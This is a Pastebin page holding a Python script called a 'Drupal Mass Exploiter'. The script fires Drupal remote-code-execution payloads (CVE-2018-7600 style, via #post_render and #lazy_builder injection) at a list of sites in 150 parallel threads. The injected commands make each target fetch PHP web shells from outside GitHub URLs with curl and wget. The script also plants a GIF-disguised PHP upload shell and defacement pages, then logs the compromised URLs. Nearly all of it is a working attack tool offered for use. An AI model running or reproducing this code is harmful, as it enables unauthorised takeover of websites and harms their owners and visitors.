ToKeiChun

Drupal Mass Exploiter Priv8 (by izocin)

Sep 24th, 2020 (edited)
349
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 21.13 KB | None | 0 0
  1. #!/usr/bin/python
  2.  
  3. # Coded By izocin
  4. # Turkey
  5.  
  6. import requests, re, urllib2, os, sys, codecs,binascii, json                   
  7. from multiprocessing.dummy import Pool                         
  8. from time import time as timer 
  9. import time
  10. from random import sample as rand
  11. from Queue import Queue                    
  12. from platform import system
  13. from colorama import Fore                              
  14. from colorama import Style                             
  15. from pprint import pprint                              
  16. from colorama import init                                              
  17. init(autoreset=True)
  18. requests.urllib3.disable_warnings()                                
  19.                                                            
  20. ####### Colors   ######
  21. def progressbar(it, prefix = "", size = 1000):
  22.     count = len(it)
  23.     def _show(_i):
  24.         x = int(size*_i/count)
  25.         sys.stdout.write("%s[%s%s] %i/%i\r" % (prefix, "#"*x, "_"*(size-x), _i, count))
  26.         sys.stdout.flush()
  27.     _show(0)
  28.     for i, item in enumerate(it):
  29.         yield item
  30.         _show(i+1)
  31.     sys.stdout.write("\n")
  32.     sys.stdout.flush()
  33. toolbar_width = 30
  34.  
  35. sys.stdout.write(":%s:" % (" " * toolbar_width))
  36. sys.stdout.flush()
  37. sys.stdout.write("\b" * (toolbar_width+1))
  38.  
  39. for i in xrange(toolbar_width):
  40.     time.sleep(0.01)
  41.  
  42.     sys.stdout.write("*")
  43.     sys.stdout.flush()
  44.  
  45. sys.stdout.write("\n") 
  46.  
  47. fr  =   Fore.RED                                           
  48. fc  =   Fore.CYAN                                          
  49. fw  =   Fore.WHITE                                         
  50. fg  =   Fore.GREEN                                         
  51. sd  =   Style.DIM                                          
  52. sn  =   Style.NORMAL                                       
  53. sb  =   Style.BRIGHT                                       
  54.  
  55. #######################
  56. try:
  57.     with codecs.open(sys.argv[1], mode='r', encoding='ascii', errors='ignore') as f:
  58.         ooo = f.read().splitlines()
  59. except IOError:
  60.     pass
  61. ooo = list((ooo))
  62.  
  63.  
  64. if system() == 'Linux':
  65.         os.system('clear')
  66.  
  67.  
  68.  
  69. shell = """GIF89a <?php echo 'M3 2018'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd(); Echo '<center>  <form method="post" Joomla="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center></td></tr> </table><br>'; if (!empty ($_FILES['uploads'])) {     move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);     Echo "<script>alert('upload Done');       </script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type']; } ?>"""
  70.  
  71.  
  72.  
  73.  
  74.  
  75.  
  76. def sitebul(url):
  77.    
  78.    
  79.     try:   
  80.  
  81.  
  82.         # 22 . rev
  83.  
  84.  
  85.         get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php && wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php', 'name[#type]':'markup'}
  86.         post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  87.         r = requests.post(url, data=post_params, params=get_params)
  88.        
  89.        
  90.         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  91.         if m:
  92.             found = m.group(1)
  93.        
  94.         get_params = {'q':'file/ajax/name/#value/' + found}
  95.         post_params = {'form_build_id':found}
  96.         r = requests.post(url, data=post_params, params=get_params)
  97.  
  98.         lib = requests.get(url+'/dick.php')
  99.        
  100.        
  101.         if re.findall("M3", lib.content):
  102.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7     {}{} Shell upload  '.format(sb, sd, url, fc,fc, sb,fg)
  103.             open('Shell.txt', 'a').write(url+'/dick.php'+'\n')
  104.             sys.exit()
  105.        
  106.         else:
  107.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)  
  108.         get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php && wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php', 'name[#type]':'markup'}
  109.         post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  110.         r = requests.post(url, data=post_params, params=get_params)
  111.        
  112.        
  113.         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  114.         if m:
  115.             found = m.group(1)
  116.        
  117.         get_params = {'q':'file/ajax/name/#value/' + found}
  118.         post_params = {'form_build_id':found}
  119.         r = requests.post(url, data=post_params, params=get_params)
  120.  
  121.         lib = requests.get(url+'/dick.php')
  122.        
  123.        
  124.         if re.findall("M3", lib.content):
  125.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7     {}{} Shell upload  '.format(sb, sd, url, fc,fc, sb,fg)
  126.             open('Shell.txt', 'a').write(url+'/dick.php'+'\n')
  127.             sys.exit()
  128.         else:
  129.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)              
  130.  
  131.         # 22 . rev
  132.  
  133.  
  134.         Index_page = "echo 'M3sicth' > m3.htm"
  135.         get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]': Index_page, 'name[#type]': 'markup'}
  136.         post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  137.         r = requests.post(url, data=post_params, params=get_params)
  138.        
  139.        
  140.         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  141.         if m:
  142.             found = m.group(1)
  143.        
  144.         get_params = {'q':'file/ajax/name/#value/' + found}
  145.         post_params = {'form_build_id':found}
  146.         r = requests.post(url, data=post_params, params=get_params)
  147.  
  148.         lib = requests.get(url+'/m3.htm')
  149.        
  150.        
  151.         if re.findall("M3sicth", lib.content):
  152.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7     {}{} index upload  '.format(sb, sd, url, fc,fc, sb,fg)
  153.             open('index.txt', 'a').write(url+'/m3.htm'+'\n')
  154.  
  155.         else:
  156.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 index     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  157.  
  158.        
  159.         get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]':'curl https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php && wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php', 'name[#type]':'markup'}
  160.         post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  161.         r = requests.post(url, data=post_params, params=get_params)
  162.        
  163.        
  164.         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  165.         if m:
  166.             found = m.group(1)
  167.        
  168.         get_params = {'q':'file/ajax/name/#value/' + found}
  169.         post_params = {'form_build_id':found}
  170.         r = requests.post(url, data=post_params, params=get_params)
  171.  
  172.         lib = requests.get(url+'/payload.php')
  173.        
  174.        
  175.         if re.findall("Spider Project", lib.content):
  176.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 V2     {}{} Shell upload  '.format(sb, sd, url, fc,fc, sb,fg)
  177.             open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
  178.             sys.exit()
  179.         else:
  180.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 V2    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)            
  181.  
  182.         # 22 . rev
  183.  
  184.  
  185.         Index_page = "echo 'izocin' > vuln.htm"
  186.         get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]': Index_page, 'name[#type]': 'markup'}
  187.         post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  188.         r = requests.post(url, data=post_params, params=get_params)
  189.        
  190.        
  191.         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  192.         if m:
  193.             found = m.group(1)
  194.        
  195.         get_params = {'q':'file/ajax/name/#value/' + found}
  196.         post_params = {'form_build_id':found}
  197.         r = requests.post(url, data=post_params, params=get_params)
  198.  
  199.         lib = requests.get(url+'/vuln.htm')
  200.        
  201.        
  202.         if re.findall("izocin", lib.content):
  203.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 2    {}{} index upload  '.format(sb, sd, url, fc,fc, sb,fg)
  204.             open('drupal-index.txt', 'a').write(url+'/vuln.htm'+'\n')
  205.  
  206.         else:
  207.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 2 index     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)  
  208.  
  209.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php && curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php'}
  210.         headers = {'User-Agent': 'Mozilla 5.0'}            
  211.         r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  212.         if 'M3sicth' in requests.get(url+'/payload.php', verify=False, headers=headers).text:
  213.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 payload    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  214.             open('Shell.txt', 'a').write(url+'/payload.php'+'\n')
  215.             sys.exit() 
  216.         else:
  217.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 payload     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)  
  218.  
  219.  
  220.            
  221.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php && wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php'}
  222.         headers = {'User-Agent': 'Mozilla 5.0'}            
  223.         r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  224.         if 'M3sicth' in requests.get(url+'/payload.php', headers=headers).text:
  225.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 mail   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  226.             open('Shell.txt', 'a').write(url+'/payload.php'+'\n')
  227.             sys.exit() 
  228.         else:
  229.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 mail    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  230.  
  231.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail["a"][#lazy_builder][0]': 'exec', 'mail["a"][#lazy_builder][1][]': 'curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php && wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php'}
  232.         headers = {'User-Agent': 'Mozilla 5.0'}            
  233.         r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  234.         if 'M3sicth' in requests.get(url+'/payload.php', headers=headers).text:
  235.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 lazy_builder   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  236.             open('Shell.txt', 'a').write(url+'/payload.php'+'\n')
  237.             sys.exit() 
  238.         else:
  239.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 lazy_builder    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  240.  
  241.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'timezone[a][#lazy_builder][]': 'exec', 'timezone[a][#lazy_builder][][]': 'curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php && wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php'}
  242.         headers = {'User-Agent': 'Mozilla 5.0'}            
  243.         r = requests.post(url+ '/user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  244.         if 'M3sicth' in requests.get(url+'/payload.php', headers=headers).text:
  245.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 timezone    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  246.             open('Shell.txt', 'a').write(url+'/payload.php'+'\n')
  247.             sys.exit() 
  248.         else:
  249.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 timezone     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)         
  250.  
  251.                
  252.         r = requests.post(url+'/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}, data={"form_id": "user_register_form", "_drupal_ajax": "1", "mail[#post_render][]": "exec", "mail[#type]": "markup", "mail[#markup]": "curl https://raw.githubusercontent.com/concuconz/caca/master/dick.php && wget https://raw.githubusercontent.com/concuconz/caca/master/dick.php"})
  253.         if 'M3sicth' in requests.get(url+'/payload.php').text:
  254.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 post_render    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  255.             open('Shell.txt', 'a').write(url+'/payload.php'+'\n')
  256.             sys.exit() 
  257.         else:
  258.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 post_render     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  259.  
  260.         headers = {'User-Agent': 'Mozilla 5.0'}
  261.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
  262.                    'mail[#type]': 'markup', 'mail[#markup]': 'echo Vuln!! patch it Now!> m3.htm'}
  263.         payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "' + shell + '"> vuln.php'}          
  264.         ar = requests.post(url+'/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, timeout=5)
  265.         if 'Vuln!!' in requests.get(url+'/vuln.htm', headers=headers).text:
  266.             print '[{}Drupal]: {} {}           ====> {}{} CVE-2018-7600 RCE V8 index   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  267.             open('index.txt', 'a').write(url+'/m3.htm'+'\n')
  268.             sys.exit()
  269.            
  270.         rr = requests.post(url+ '/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload2)
  271.         if 'M3sicth' in requests.get(url+'/vuln.php', headers=headers).text:
  272.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 post_render   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  273.             open('index.txt', 'a').write(url+'/m3.htm'+'\n')
  274.             sys.exit()         
  275.         else:
  276.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)   
  277.            
  278.        
  279.         # 22 . rev
  280.  
  281.  
  282.         Index_page = "echo 'izocin' > vuln.htm"
  283.         get_params = {'q':'user/password', 'name[#post_render][]':'passthru', 'name[#markup]': Index_page, 'name[#type]': 'markup'}
  284.         post_params = {'form_id':'user_pass', '_triggering_element_name':'name'}
  285.         r = requests.post(url, data=post_params, params=get_params)
  286.        
  287.        
  288.         m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
  289.         if m:
  290.             found = m.group(1)
  291.        
  292.         get_params = {'q':'file/ajax/name/#value/' + found}
  293.         post_params = {'form_build_id':found}
  294.         r = requests.post(url, data=post_params, params=get_params)
  295.  
  296.         lib = requests.get(url+'/vuln.htm')
  297.        
  298.        
  299.         if re.findall("izocin", lib.content):
  300.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7     {}{} index upload  '.format(sb, sd, url, fc,fc, sb,fg)
  301.             open('drupal-index.txt', 'a').write(url+'/vuln.htm'+'\n')
  302.  
  303.         else:
  304.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 index     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  305.            
  306.  
  307.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php && curl https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
  308.         headers = {'User-Agent': 'Mozilla 5.0'}            
  309.         r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  310.         if 'Spider Project' in requests.get(url+'/payload.php', verify=False, headers=headers).text:
  311.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 payload    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  312.             open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
  313.             sys.exit() 
  314.         else:
  315.             print '[{}Drupal]: {} {}           ====> {}{} RCE V7 payload     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)  
  316.  
  317.  
  318.            
  319.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'curl https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php && wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
  320.         headers = {'User-Agent': 'Mozilla 5.0'}            
  321.         r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  322.         if 'Spider Project' in requests.get(url+'/payload.php', headers=headers).text:
  323.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 mail   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  324.             open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
  325.             sys.exit() 
  326.         else:
  327.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 mail    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  328.  
  329.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail["a"][#lazy_builder][0]': 'exec', 'mail["a"][#lazy_builder][1][]': 'curl https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php && wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
  330.         headers = {'User-Agent': 'Mozilla 5.0'}            
  331.         r = requests.post(url+ '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  332.         if 'Spider Project' in requests.get(url+'/payload.php', headers=headers).text:
  333.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 lazy_builder   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  334.             open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
  335.             sys.exit() 
  336.         else:
  337.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 lazy_builder    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  338.  
  339.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'timezone[a][#lazy_builder][]': 'exec', 'timezone[a][#lazy_builder][][]': 'curl https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php && wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
  340.         headers = {'User-Agent': 'Mozilla 5.0'}            
  341.         r = requests.post(url+ '/user/register%3Felement_parents=timezone/timezone/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, verify=False, headers=headers)
  342.         if 'Spider Project' in requests.get(url+'/payload.php', headers=headers).text:
  343.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 timezone    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  344.             open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
  345.             sys.exit() 
  346.         else:
  347.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 timezone     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)         
  348.  
  349.                
  350.         r = requests.post(url+'/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'}, data={"form_id": "user_register_form", "_drupal_ajax": "1", "mail[#post_render][]": "exec", "mail[#type]": "markup", "mail[#markup]": "curl https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php && wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php"})
  351.         if 'Spider Project' in requests.get(url+'/payload.php').text:
  352.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 post_render    {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  353.             open('Shells.txt', 'a').write(url+'/payload.php'+'\n')
  354.             sys.exit() 
  355.         else:
  356.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 post_render     {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)
  357.  
  358.         headers = {'User-Agent': 'Mozilla 5.0'}
  359.         payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
  360.                    'mail[#type]': 'markup', 'mail[#markup]': 'echo Vuln!! patch it Now!> vuln.htm'}
  361.         payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "' + shell + '"> vuln.php'}          
  362.         ar = requests.post(url+'/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload, timeout=5)
  363.         if 'Vuln!!' in requests.get(url+'/vuln.htm', headers=headers).text:
  364.             print '[{}Drupal]: {} {}           ====> {}{} CVE-2018-7600 RCE V8 index   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  365.             open('drupal-index.txt', 'a').write(url+'/vuln.htm'+'\n')
  366.             sys.exit()
  367.            
  368.         rr = requests.post(url+ '/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax', data=payload2)
  369.         if 'izocin' in requests.get(url+'/vuln.php', headers=headers).text:
  370.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8 post_render   {}{} Success upload  '.format(sb, sd, url, fc,fc, sb,fg)
  371.             open('drupal-index.txt', 'a').write(url+'/vuln.htm'+'\n')
  372.             sys.exit()         
  373.         else:
  374.             print '[{}Drupal]: {} {}           ====> {}{} RCE V8    {}{} Failed  '.format(sb, sd, url, fc,fc, sb,fr)   
  375.  
  376.            
  377.     except:
  378.         pass
  379.        
  380.                
  381.                
  382.        
  383.  
  384.    
  385. def Main():
  386.     try:
  387.        
  388.         start = timer()
  389.         ThreadPool = Pool(150)
  390.         Threads = ThreadPool.map(sitebul, ooo)
  391.         print('Time: ' + str(timer() - start) + ' seconds')
  392.     except:
  393.         pass
  394.  
  395.  
  396. if __name__ == '__main__':
  397.     Main()
Add Comment
Please, Sign In to add comment